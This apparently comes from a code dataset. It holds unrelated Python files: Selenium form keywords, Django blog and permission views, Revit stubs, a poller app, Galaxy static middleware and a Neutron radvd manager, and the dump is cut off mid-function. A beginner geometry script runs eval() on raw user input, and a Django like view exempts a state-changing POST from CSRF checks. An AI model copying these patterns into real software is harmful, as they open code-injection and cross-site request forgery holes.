if element.is_selected():
raise AssertionError("Checkbox '%s' should not have been "
"selected." % locator)
@keyword
def page_should_contain_checkbox(self, locator, message=None, loglevel='TRACE'):
self.assert_page_contains(locator, 'checkbox', message, loglevel)
@keyword
def page_should_not_contain_checkbox(self, locator, message=None, loglevel='TRACE'):
self.assert_page_not_contains(locator, 'checkbox', message, loglevel)
@keyword
def select_checkbox(self, locator):
self.info("Selecting checkbox '%s'." % locator)
element = self._get_checkbox(locator)
if not element.is_selected():
element.click()
@keyword
def unselect_checkbox(self, locator):
self.info("Unselecting checkbox '%s'." % locator)
element = self._get_checkbox(locator)
if element.is_selected():
element.click()
@keyword
def page_should_contain_radio_button(self, locator, message=None, loglevel='TRACE'):
self.assert_page_contains(locator, 'radio button', message, loglevel)
@keyword
def page_should_not_contain_radio_button(self, locator, message=None, loglevel='TRACE'):
self.assert_page_not_contains(locator, 'radio button', message,
loglevel)
@keyword
def radio_button_should_be_set_to(self, group_name, value):
self.info("Verifying radio button '%s' has selection '%s'."
% (group_name, value))
elements = self._get_radio_buttons(group_name)
actual_value = self._get_value_from_radio_buttons(elements)
if actual_value is None or actual_value != value:
raise AssertionError("Selection of radio button '%s' should have "
"been '%s' but was '%s'."
% (group_name, value, actual_value))
@keyword
def radio_button_should_not_be_selected(self, group_name):
self.info("Verifying radio button '%s' has no selection." % group_name)
elements = self._get_radio_buttons(group_name)
actual_value = self._get_value_from_radio_buttons(elements)
if actual_value is not None:
raise AssertionError("Radio button group '%s' should not have "
"had selection, but '%s' was selected."
% (group_name, actual_value))
@keyword
def select_radio_button(self, group_name, value):
self.info("Selecting '%s' from radio button '%s'."
% (value, group_name))
element = self._get_radio_button_with_value(group_name, value)
if not element.is_selected():
element.click()
@keyword
def choose_file(self, locator, file_path):
if not os.path.isfile(file_path):
raise ValueError("File '%s' does not exist on the local file "
"system." % file_path)
self.find_element(locator).send_keys(file_path)
@keyword
def input_password(self, locator, password, clear=True):
self.info("Typing password into text field '%s'." % locator)
self._input_text_into_text_field(locator, password, clear)
@keyword
def input_text(self, locator, text, clear=True):
self.info("Typing text '%s' into text field '%s'." % (text, locator))
self._input_text_into_text_field(locator, text, clear)
@keyword
def page_should_contain_textfield(self, locator, message=None, loglevel='TRACE'):
self.assert_page_contains(locator, 'text field', message, loglevel)
@keyword
def page_should_not_contain_textfield(self, locator, message=None, loglevel='TRACE'):
self.assert_page_not_contains(locator, 'text field', message, loglevel)
@keyword
def textfield_should_contain(self, locator, expected, message=None):
actual = self._get_value(locator, 'text field')
if expected not in actual:
if is_noney(message):
message = "Text field '%s' should have contained text '%s' "\
"but it contained '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Text field '%s' contains text '%s'." % (locator, expected))
@keyword
def textfield_value_should_be(self, locator, expected, message=None):
actual = self._get_value(locator, 'text field')
if actual != expected:
if is_noney(message):
message = "Value of text field '%s' should have been '%s' "\
"but was '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Content of text field '%s' is '%s'." % (locator, expected))
@keyword
def textarea_should_contain(self, locator, expected, message=None):
actual = self._get_value(locator, 'text area')
if expected not in actual:
if is_noney(message):
message = "Text area '%s' should have contained text '%s' " \
"but it had '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Text area '%s' contains text '%s'." % (locator, expected))
@keyword
def textarea_value_should_be(self, locator, expected, message=None):
actual = self._get_value(locator, 'text area')
if expected != actual:
if is_noney(message):
message = "Text area '%s' should have had text '%s' " \
"but it had '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Content of text area '%s' is '%s'." % (locator, expected))
@keyword
def page_should_contain_button(self, locator, message=None, loglevel='TRACE'):
try:
self.assert_page_contains(locator, 'input', message, loglevel)
except AssertionError:
self.assert_page_contains(locator, 'button', message, loglevel)
@keyword
def page_should_not_contain_button(self, locator, message=None, loglevel='TRACE'):
self.assert_page_not_contains(locator, 'button', message, loglevel)
self.assert_page_not_contains(locator, 'input', message, loglevel)
def _get_value(self, locator, tag):
return self.find_element(locator, tag).get_attribute('value')
def _get_checkbox(self, locator):
return self.find_element(locator, tag='checkbox')
def _get_radio_buttons(self, group_name):
xpath = "xpath://input[@type='radio' and @name='%s']" % group_name
self.debug('Radio group locator: ' + xpath)
elements = self.find_elements(xpath)
if not elements:
raise ElementNotFound("No radio button with name '%s' found."
% group_name)
return elements
def _get_radio_button_with_value(self, group_name, value):
xpath = "xpath://input[@type='radio' and @name='%s' and " \
"(@value='%s' or @id='%s')]" % (group_name, value, value)
self.debug('Radio group locator: ' + xpath)
try:
return self.find_element(xpath)
except ElementNotFound:
raise ElementNotFound("No radio button with name '%s' and "
"value '%s' found." % (group_name, value))
def _get_value_from_radio_buttons(self, elements):
for element in elements:
if element.is_selected():
return element.get_attribute('value')
return None
def _input_text_into_text_field(self, locator, text, clear):
element = self.find_element(locator)
if is_truthy(clear):
element.clear()
element.send_keys(text)
| true | true |
f723396434a2a3221ad85a3010ec7484b2d1378c | 219 | py | Python | Questoes/b1_q10_quadrado.py | viniciusm0raes/python | c4d4f1a08d1e4de105109e1f67fae9fcc20d7fce | [
"MIT"
] | null | null | null | Questoes/b1_q10_quadrado.py | viniciusm0raes/python | c4d4f1a08d1e4de105109e1f67fae9fcc20d7fce | [
"MIT"
] | null | null | null | Questoes/b1_q10_quadrado.py | viniciusm0raes/python | c4d4f1a08d1e4de105109e1f67fae9fcc20d7fce | [
"MIT"
] | null | null | null | import math
lado = eval(input("Informe o lado do quadrado em cm: "))
area = math.pow(lado,2)
perim = lado*4
print('A área do quadrado é igual a: ', area, 'cm')
print('O perímetro do quadro é igual a: ', perim, 'cm') | 21.9 | 56 | 0.6621 | import math
lado = eval(input("Informe o lado do quadrado em cm: "))
area = math.pow(lado,2)
perim = lado*4
print('A área do quadrado é igual a: ', area, 'cm')
print('O perímetro do quadro é igual a: ', perim, 'cm') | true | true |
f7233ab2b8e1a5cfddc61416c5274d6fab1e8f41 | 1,213 | py | Python | stackdio/ui/utils.py | hdmillerdr/stackdio | 84be621705031d147e104369399b872d5093ef64 | [
"Apache-2.0"
] | 9 | 2015-12-18T22:44:55.000Z | 2022-02-07T19:34:44.000Z | stackdio/ui/utils.py | hdmillerdr/stackdio | 84be621705031d147e104369399b872d5093ef64 | [
"Apache-2.0"
] | 77 | 2015-01-12T17:49:38.000Z | 2017-02-24T17:57:46.000Z | stackdio/ui/utils.py | hdmillerdr/stackdio | 84be621705031d147e104369399b872d5093ef64 | [
"Apache-2.0"
] | 11 | 2015-01-23T15:50:19.000Z | 2022-02-07T19:34:45.000Z | # -*- coding: utf-8 -*-
# Copyright 2017, Digital Reasoning
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import unicode_literals
from django.db.models import Model
def get_object_list(user, model_cls, pk_field='id'):
assert issubclass(model_cls, Model)
model_name = model_cls._meta.model_name
object_list = []
for obj in model_cls.objects.all():
if user.has_perm('view_%s' % model_name, obj):
object_list.append({
'id': getattr(obj, pk_field),
'can_delete': user.has_perm('delete_%s' % model_name, obj),
'can_update': user.has_perm('update_%s' % model_name, obj),
})
return object_list
| 32.783784 | 75 | 0.6892 |
from __future__ import unicode_literals
from django.db.models import Model
def get_object_list(user, model_cls, pk_field='id'):
assert issubclass(model_cls, Model)
model_name = model_cls._meta.model_name
object_list = []
for obj in model_cls.objects.all():
if user.has_perm('view_%s' % model_name, obj):
object_list.append({
'id': getattr(obj, pk_field),
'can_delete': user.has_perm('delete_%s' % model_name, obj),
'can_update': user.has_perm('update_%s' % model_name, obj),
})
return object_list
| true | true |
f7233b3ab8ec3d79780576a9151a6f127bef71f2 | 1,083 | py | Python | stubs.min/Autodesk/Revit/DB/__init___parts/GridSegmentDirection.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/Autodesk/Revit/DB/__init___parts/GridSegmentDirection.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/Autodesk/Revit/DB/__init___parts/GridSegmentDirection.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class GridSegmentDirection(Enum,IComparable,IFormattable,IConvertible):
"""
Specify one of the four adjacent segments to a
GridNode.
See Autodesk.Revit.DB.DividedSurface.
enum GridSegmentDirection,values: NegativeU (1),NegativeV (3),PositiveU (0),PositiveV (2)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
NegativeU=None
NegativeV=None
PositiveU=None
PositiveV=None
value__=None
| 28.5 | 215 | 0.676824 | class GridSegmentDirection(Enum,IComparable,IFormattable,IConvertible):
""" __format__(formattable: IFormattable,format: str) -> str """
def __ge__(self,*args):
pass
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
NegativeU=None
NegativeV=None
PositiveU=None
PositiveV=None
value__=None
| true | true |
f7233bd5f0b8673116db69bc22d329089c672bd0 | 3,971 | py | Python | python/wheedle/app.py | kpvdr/actions-artifact-poller | 2660efb8195e1eddf8f22d694282027581da7df4 | [
"Apache-2.0"
] | 1 | 2020-10-20T15:26:13.000Z | 2020-10-20T15:26:13.000Z | python/wheedle/app.py | kpvdr/actions-artifact-poller | 2660efb8195e1eddf8f22d694282027581da7df4 | [
"Apache-2.0"
] | 3 | 2020-11-11T14:55:43.000Z | 2021-01-06T17:19:16.000Z | python/wheedle/app.py | kpvdr/actions-artifact-poller | 2660efb8195e1eddf8f22d694282027581da7df4 | [
"Apache-2.0"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
Main application
"""
import logging as _logging
import multiprocessing as _mp
import fortworth as _fortworth
import wheedle.artifact_poller as _apoller
import wheedle.commit_poller as _cpoller
import wheedle.configuration as _config
import wheedle.errors as _errors
# pylint: disable=too-few-public-methods
class Application:
""" Poller application """
def __init__(self, home, data_dir=None, config_file=None):
self._home = home
self._log = _logging.getLogger(self.__class__.__name__)
self._process_list = []
config_file = config_file if config_file is not None else _fortworth.join(home,
'wheedle.conf')
self._config = _config.Configuration(config_file, data_dir)
try:
_logging.basicConfig(level=self._config['Logging']['default_log_level'],
format='%(asctime)s %(name)s - %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S %Z')
except ValueError as err:
raise _errors.ConfigFileError(self._config.config_file_name(), 'Logging', err)
self._log.info('Data directory: %s', self._config.data_dir())
def run(self):
""" Run the application. This starts each of the configured artifact and commit pollers """
try:
self._start_pollers(self._config.poller_names())
# Wait for processes to terminate
for process in self._process_list:
process.join()
except _errors.PollerError as err:
self._log.error(err)
_fortworth.exit(1)
except KeyboardInterrupt:
print(' KeyboardInterrupt')
self._log.info('exit')
def _start_pollers(self, poller_name_list):
for poller_name in poller_name_list:
ap_event = None
if self._config.has_commit_poller(poller_name):
ap_event = _mp.Event()
self._start_commit_poller(poller_name, ap_event)
self._start_artifact_poller(poller_name, ap_event)
def _start_artifact_poller(self, name, ap_event):
""" Start the named artifact poller """
artifact_poller_process = _mp.Process(target=_apoller.ArtifactPoller.run,
args=(self._config, name, ap_event),
name=name + '-AP')
artifact_poller_process.start()
self._process_list.append(artifact_poller_process)
def _start_commit_poller(self, name, ap_event):
""" Start the named commit poller """
commit_poller_process = _mp.Process(target=_cpoller.CommitPoller.run,
args=(self._config, name, ap_event),
name=name + '-CP')
commit_poller_process.start()
self._process_list.append(commit_poller_process)
if __name__ == '__main__':
try:
APP = Application(_fortworth.current_dir())
APP.run()
except _errors.PollerError as err:
print(err)
_fortworth.exit(1)
| 38.553398 | 99 | 0.634097 |
import logging as _logging
import multiprocessing as _mp
import fortworth as _fortworth
import wheedle.artifact_poller as _apoller
import wheedle.commit_poller as _cpoller
import wheedle.configuration as _config
import wheedle.errors as _errors
class Application:
def __init__(self, home, data_dir=None, config_file=None):
self._home = home
self._log = _logging.getLogger(self.__class__.__name__)
self._process_list = []
config_file = config_file if config_file is not None else _fortworth.join(home,
'wheedle.conf')
self._config = _config.Configuration(config_file, data_dir)
try:
_logging.basicConfig(level=self._config['Logging']['default_log_level'],
format='%(asctime)s %(name)s - %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S %Z')
except ValueError as err:
raise _errors.ConfigFileError(self._config.config_file_name(), 'Logging', err)
self._log.info('Data directory: %s', self._config.data_dir())
def run(self):
try:
self._start_pollers(self._config.poller_names())
for process in self._process_list:
process.join()
except _errors.PollerError as err:
self._log.error(err)
_fortworth.exit(1)
except KeyboardInterrupt:
print(' KeyboardInterrupt')
self._log.info('exit')
def _start_pollers(self, poller_name_list):
for poller_name in poller_name_list:
ap_event = None
if self._config.has_commit_poller(poller_name):
ap_event = _mp.Event()
self._start_commit_poller(poller_name, ap_event)
self._start_artifact_poller(poller_name, ap_event)
def _start_artifact_poller(self, name, ap_event):
artifact_poller_process = _mp.Process(target=_apoller.ArtifactPoller.run,
args=(self._config, name, ap_event),
name=name + '-AP')
artifact_poller_process.start()
self._process_list.append(artifact_poller_process)
def _start_commit_poller(self, name, ap_event):
commit_poller_process = _mp.Process(target=_cpoller.CommitPoller.run,
args=(self._config, name, ap_event),
name=name + '-CP')
commit_poller_process.start()
self._process_list.append(commit_poller_process)
if __name__ == '__main__':
try:
APP = Application(_fortworth.current_dir())
APP.run()
except _errors.PollerError as err:
print(err)
_fortworth.exit(1)
| true | true |
f7233c75ff594cef6295b4e8cfce6d7da0477e0e | 3,650 | py | Python | src/application/blog/views.py | AriyaOk/study_python | dd2b24dc5a94d2cb100463f49739453d4e7b6203 | [
"MIT"
] | null | null | null | src/application/blog/views.py | AriyaOk/study_python | dd2b24dc5a94d2cb100463f49739453d4e7b6203 | [
"MIT"
] | 10 | 2020-10-20T18:09:16.000Z | 2021-09-22T19:45:32.000Z | src/application/blog/views.py | AriyaOk/study_python | dd2b24dc5a94d2cb100463f49739453d4e7b6203 | [
"MIT"
] | null | null | null | from functools import wraps
from typing import Dict
from django import forms
from django.db import transaction
from django.db.models import F
from django.http import HttpResponse
from django.http import JsonResponse
from django.urls import reverse_lazy
from django.utils.decorators import method_decorator
from django.views import View
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import CreateView
from django.views.generic import DeleteView
from django.views.generic import ListView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from application.blog.models import BlogPost
from application.blog.models import UserLike
from framework.mixins import ExtendedContextMixin
class PostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = ["title", "content"]
widgets = {
"title": forms.TextInput(),
"content": forms.Textarea(attrs={"rows": 2}),
}
class AllPostsView(ExtendedContextMixin, ListView):
template_name = "blog/all_posts.html"
model = BlogPost
def get_extended_context(self) -> Dict:
context = {"form": PostForm()}
return context
class NewPostView(CreateView):
http_method_names = ["post"]
model = BlogPost
fields = ["content", "title"]
success_url = reverse_lazy("blog:all")
def form_valid(self, form):
post = form.save(commit=False)
post.author = self.request.user
return super().form_valid(form)
class DelAll(RedirectView):
def get_redirect_url(self, *args, **kwargs):
BlogPost.objects.all().delete()
return reverse_lazy("blog:all")
class DeletePostView(DeleteView):
http_method_names = ["post"]
model = BlogPost
success_url = reverse_lazy("blog:all")
class PostView(UpdateView):
model = BlogPost
fields = ["content", "title"]
template_name = "blog/post.html"
success_url = reverse_lazy("blog:all")
def form_valid(self, form):
self.object.edited = True
return super().form_valid(form)
@method_decorator(csrf_exempt, name="dispatch")
class PostLike(View):
def get(self, request, *args, **kwargs):
nr = BlogPost.objects.get(pk=kwargs.get("pk")).nr_likes
payload = str(nr)
return HttpResponse(payload, content_type="text/plain")
def post(self, request, *args, **kwargs):
payload = {
"ok": False,
"nr_likes": 0,
"is_like": False,
"reason": "unknown reason",
}
try:
pk = kwargs.get("pk", 0)
post = BlogPost.objects.get(pk=pk)
user = self.request.user
except Exception:
payload.update({"reason": "post not found"})
else:
try:
userlike = UserLike.objects.get(user=user, post=post)
except UserLike.DoesNotExist:
userlike = UserLike(user=user, post=post)
userlike.save()
# post.nr_likes += 1
# post.save()
is_like = True
else:
userlike.delete()
# post.nr_likes -= 1
# post.save()
is_like = False
post = BlogPost.objects.get(pk=pk)
nr_like = UserLike.objects.filter(post=post).count()
payload.update(
{
"ok": True,
"nr_likes": nr_like,
"is_like": is_like,
"reason": None,
}
)
return JsonResponse(payload)
| 27.862595 | 69 | 0.607945 | from functools import wraps
from typing import Dict
from django import forms
from django.db import transaction
from django.db.models import F
from django.http import HttpResponse
from django.http import JsonResponse
from django.urls import reverse_lazy
from django.utils.decorators import method_decorator
from django.views import View
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import CreateView
from django.views.generic import DeleteView
from django.views.generic import ListView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from application.blog.models import BlogPost
from application.blog.models import UserLike
from framework.mixins import ExtendedContextMixin
class PostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = ["title", "content"]
widgets = {
"title": forms.TextInput(),
"content": forms.Textarea(attrs={"rows": 2}),
}
class AllPostsView(ExtendedContextMixin, ListView):
template_name = "blog/all_posts.html"
model = BlogPost
def get_extended_context(self) -> Dict:
context = {"form": PostForm()}
return context
class NewPostView(CreateView):
http_method_names = ["post"]
model = BlogPost
fields = ["content", "title"]
success_url = reverse_lazy("blog:all")
def form_valid(self, form):
post = form.save(commit=False)
post.author = self.request.user
return super().form_valid(form)
class DelAll(RedirectView):
def get_redirect_url(self, *args, **kwargs):
BlogPost.objects.all().delete()
return reverse_lazy("blog:all")
class DeletePostView(DeleteView):
http_method_names = ["post"]
model = BlogPost
success_url = reverse_lazy("blog:all")
class PostView(UpdateView):
model = BlogPost
fields = ["content", "title"]
template_name = "blog/post.html"
success_url = reverse_lazy("blog:all")
def form_valid(self, form):
self.object.edited = True
return super().form_valid(form)
@method_decorator(csrf_exempt, name="dispatch")
class PostLike(View):
def get(self, request, *args, **kwargs):
nr = BlogPost.objects.get(pk=kwargs.get("pk")).nr_likes
payload = str(nr)
return HttpResponse(payload, content_type="text/plain")
def post(self, request, *args, **kwargs):
payload = {
"ok": False,
"nr_likes": 0,
"is_like": False,
"reason": "unknown reason",
}
try:
pk = kwargs.get("pk", 0)
post = BlogPost.objects.get(pk=pk)
user = self.request.user
except Exception:
payload.update({"reason": "post not found"})
else:
try:
userlike = UserLike.objects.get(user=user, post=post)
except UserLike.DoesNotExist:
userlike = UserLike(user=user, post=post)
userlike.save()
is_like = True
else:
userlike.delete()
is_like = False
post = BlogPost.objects.get(pk=pk)
nr_like = UserLike.objects.filter(post=post).count()
payload.update(
{
"ok": True,
"nr_likes": nr_like,
"is_like": is_like,
"reason": None,
}
)
return JsonResponse(payload)
| true | true |
f7233cc503bee7eeaf7e047cdce25d7b9557c9fd | 2,161 | py | Python | lib/galaxy/web/framework/middleware/static.py | ramezrawas/galaxy-1 | c03748dd49c060a68d07bce56eae33e0ba154414 | [
"CC-BY-3.0"
] | 6 | 2018-11-03T22:43:35.000Z | 2022-02-15T17:51:33.000Z | lib/galaxy/web/framework/middleware/static.py | igorhollaender/OBSOLETE_sirv_dashboard | 85aec60b80ef6f561d89398e3da5963d3d0f2aa4 | [
"CC-BY-3.0"
] | 3 | 2015-06-06T22:16:03.000Z | 2015-11-12T00:22:45.000Z | lib/galaxy/web/framework/middleware/static.py | igorhollaender/OBSOLETE_sirv_dashboard | 85aec60b80ef6f561d89398e3da5963d3d0f2aa4 | [
"CC-BY-3.0"
] | 10 | 2017-04-10T21:40:22.000Z | 2022-02-21T16:50:10.000Z | import os
from paste import request
from paste import fileapp
from paste.httpheaders import ETAG
from paste.urlparser import StaticURLParser
class CacheableStaticURLParser( StaticURLParser ):
def __init__( self, directory, cache_seconds=None ):
StaticURLParser.__init__( self, directory )
self.cache_seconds = cache_seconds
def __call__( self, environ, start_response ):
path_info = environ.get('PATH_INFO', '')
if not path_info:
# See if this is a static file hackishly mapped.
if os.path.exists(self.directory) and os.path.isfile(self.directory):
app = fileapp.FileApp(self.directory)
if self.cache_seconds:
app.cache_control( max_age=int( self.cache_seconds ) )
return app(environ, start_response)
return self.add_slash(environ, start_response)
if path_info == '/':
# @@: This should obviously be configurable
filename = 'index.html'
else:
filename = request.path_info_pop(environ)
full = os.path.join(self.directory, filename)
if not os.path.exists(full):
return self.not_found(environ, start_response)
if os.path.isdir(full):
# @@: Cache?
return self.__class__(full)(environ, start_response)
if environ.get('PATH_INFO') and environ.get('PATH_INFO') != '/':
return self.error_extra_path(environ, start_response)
if_none_match = environ.get('HTTP_IF_NONE_MATCH')
if if_none_match:
mytime = os.stat(full).st_mtime
if str(mytime) == if_none_match:
headers = []
ETAG.update(headers, mytime)
start_response('304 Not Modified', headers)
return [''] # empty body
app = fileapp.FileApp(full)
if self.cache_seconds:
app.cache_control( max_age=int( self.cache_seconds ) )
return app(environ, start_response)
def make_static( global_conf, document_root, cache_seconds=None ):
return CacheableStaticURLParser( document_root, cache_seconds )
| 40.018519 | 81 | 0.631189 | import os
from paste import request
from paste import fileapp
from paste.httpheaders import ETAG
from paste.urlparser import StaticURLParser
class CacheableStaticURLParser( StaticURLParser ):
def __init__( self, directory, cache_seconds=None ):
StaticURLParser.__init__( self, directory )
self.cache_seconds = cache_seconds
def __call__( self, environ, start_response ):
path_info = environ.get('PATH_INFO', '')
if not path_info:
if os.path.exists(self.directory) and os.path.isfile(self.directory):
app = fileapp.FileApp(self.directory)
if self.cache_seconds:
app.cache_control( max_age=int( self.cache_seconds ) )
return app(environ, start_response)
return self.add_slash(environ, start_response)
if path_info == '/':
filename = 'index.html'
else:
filename = request.path_info_pop(environ)
full = os.path.join(self.directory, filename)
if not os.path.exists(full):
return self.not_found(environ, start_response)
if os.path.isdir(full):
return self.__class__(full)(environ, start_response)
if environ.get('PATH_INFO') and environ.get('PATH_INFO') != '/':
return self.error_extra_path(environ, start_response)
if_none_match = environ.get('HTTP_IF_NONE_MATCH')
if if_none_match:
mytime = os.stat(full).st_mtime
if str(mytime) == if_none_match:
headers = []
ETAG.update(headers, mytime)
start_response('304 Not Modified', headers)
return ['']
app = fileapp.FileApp(full)
if self.cache_seconds:
app.cache_control( max_age=int( self.cache_seconds ) )
return app(environ, start_response)
def make_static( global_conf, document_root, cache_seconds=None ):
return CacheableStaticURLParser( document_root, cache_seconds )
| true | true |
f7233e71a07e7c61d68b43770ba8d7053f1b01e4 | 5,136 | py | Python | neutron/agent/linux/ra.py | markmcclain/neutron | 3108d2dece0501dbb661e2f5a4bb530a199f9fde | [
"Apache-2.0"
] | 3 | 2016-08-07T01:25:54.000Z | 2021-03-01T10:19:14.000Z | neutron/agent/linux/ra.py | cyysu/neutron_read | 07d1a526d7d44ad0207d27e0ee04f1582541ab89 | [
"Apache-2.0"
] | null | null | null | neutron/agent/linux/ra.py | cyysu/neutron_read | 07d1a526d7d44ad0207d27e0ee04f1582541ab89 | [
"Apache-2.0"
] | 2 | 2016-09-10T13:21:10.000Z | 2016-12-23T01:44:53.000Z | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import jinja2
import netaddr
from oslo_config import cfg
from oslo_log import log as logging
import six
from neutron.agent.linux import external_process
from neutron.agent.linux import utils
from neutron.common import constants
RADVD_SERVICE_NAME = 'radvd'
RADVD_SERVICE_CMD = 'radvd'
LOG = logging.getLogger(__name__)
OPTS = [
cfg.StrOpt('ra_confs',
default='$state_path/ra',
help=_('Location to store IPv6 RA config files')),
]
cfg.CONF.register_opts(OPTS)
CONFIG_TEMPLATE = jinja2.Template("""interface {{ interface_name }}
{
AdvSendAdvert on;
MinRtrAdvInterval 3;
MaxRtrAdvInterval 10;
{% if ra_mode == constants.DHCPV6_STATELESS %}
AdvOtherConfigFlag on;
{% endif %}
{% if ra_mode == constants.DHCPV6_STATEFUL %}
AdvManagedFlag on;
{% endif %}
{% if ra_mode in (constants.IPV6_SLAAC, constants.DHCPV6_STATELESS) %}
prefix {{ prefix }}
{
AdvOnLink on;
AdvAutonomous on;
};
{% endif %}
};
""")
class DaemonMonitor(object):
"""Manage the data and state of an radvd process."""
def __init__(self, router_id, router_ns, process_monitor, dev_name_helper):
self._router_id = router_id
self._router_ns = router_ns
self._process_monitor = process_monitor
self._dev_name_helper = dev_name_helper
def _generate_radvd_conf(self, router_ports):
radvd_conf = utils.get_conf_file_name(cfg.CONF.ra_confs,
self._router_id,
'radvd.conf',
True)
buf = six.StringIO()
for p in router_ports:
subnets = p.get('subnets', [])
for subnet in subnets:
prefix = subnet['cidr']
if netaddr.IPNetwork(prefix).version == 6:
interface_name = self._dev_name_helper(p['id'])
ra_mode = subnet['ipv6_ra_mode']
buf.write('%s' % CONFIG_TEMPLATE.render(
ra_mode=ra_mode,
interface_name=interface_name,
prefix=prefix,
constants=constants))
utils.replace_file(radvd_conf, buf.getvalue())
return radvd_conf
def _get_radvd_process_manager(self, callback=None):
return external_process.ProcessManager(
uuid=self._router_id,
default_cmd_callback=callback,
namespace=self._router_ns,
service=RADVD_SERVICE_NAME,
conf=cfg.CONF)
def _spawn_radvd(self, radvd_conf):
def callback(pid_file):
# we need to use -m syslog and f.e. not -m stderr (the default)
# or -m stderr_syslog so that radvd 2.0+ will close stderr and
# exit after daemonization; otherwise, the current thread will
# be locked waiting for result from radvd that won't ever come
# until the process dies
radvd_cmd = [RADVD_SERVICE_CMD,
'-C', '%s' % radvd_conf,
'-p', '%s' % pid_file,
'-m', 'syslog']
return radvd_cmd
pm = self._get_radvd_process_manager(callback)
pm.enable(reload_cfg=True)
self._process_monitor.register(uuid=self._router_id,
service_name=RADVD_SERVICE_NAME,
monitored_process=pm)
LOG.debug("radvd enabled for router %s", self._router_id)
def enable(self, router_ports):
for p in router_ports:
for subnet in p['subnets']:
if netaddr.IPNetwork(subnet['cidr']).version == 6:
LOG.debug("Enable IPv6 RA for router %s", self._router_id)
radvd_conf = self._generate_radvd_conf(router_ports)
self._spawn_radvd(radvd_conf)
return
# Kill the daemon if it's running
self.disable()
def disable(self):
self._process_monitor.unregister(uuid=self._router_id,
service_name=RADVD_SERVICE_NAME)
pm = self._get_radvd_process_manager()
pm.disable()
utils.remove_conf_files(cfg.CONF.ra_confs, self._router_id)
LOG.debug("radvd disabled for router %s", self._router_id)
@property
def enabled(self):
return self._get_radvd_process_manager().active
| 34.938776 | 79 | 0.603388 |
import jinja2
import netaddr
from oslo_config import cfg
from oslo_log import log as logging
import six
from neutron.agent.linux import external_process
from neutron.agent.linux import utils
from neutron.common import constants
RADVD_SERVICE_NAME = 'radvd'
RADVD_SERVICE_CMD = 'radvd'
LOG = logging.getLogger(__name__)
OPTS = [
cfg.StrOpt('ra_confs',
default='$state_path/ra',
help=_('Location to store IPv6 RA config files')),
]
cfg.CONF.register_opts(OPTS)
CONFIG_TEMPLATE = jinja2.Template("""interface {{ interface_name }}
{
AdvSendAdvert on;
MinRtrAdvInterval 3;
MaxRtrAdvInterval 10;
{% if ra_mode == constants.DHCPV6_STATELESS %}
AdvOtherConfigFlag on;
{% endif %}
{% if ra_mode == constants.DHCPV6_STATEFUL %}
AdvManagedFlag on;
{% endif %}
{% if ra_mode in (constants.IPV6_SLAAC, constants.DHCPV6_STATELESS) %}
prefix {{ prefix }}
{
AdvOnLink on;
AdvAutonomous on;
};
{% endif %}
};
""")
class DaemonMonitor(object):
def __init__(self, router_id, router_ns, process_monitor, dev_name_helper):
self._router_id = router_id
self._router_ns = router_ns
self._process_monitor = process_monitor
self._dev_name_helper = dev_name_helper
def _generate_radvd_conf(self, router_ports):
radvd_conf = utils.get_conf_file_name(cfg.CONF.ra_confs,
self._router_id,
'radvd.conf',
True)
buf = six.StringIO()
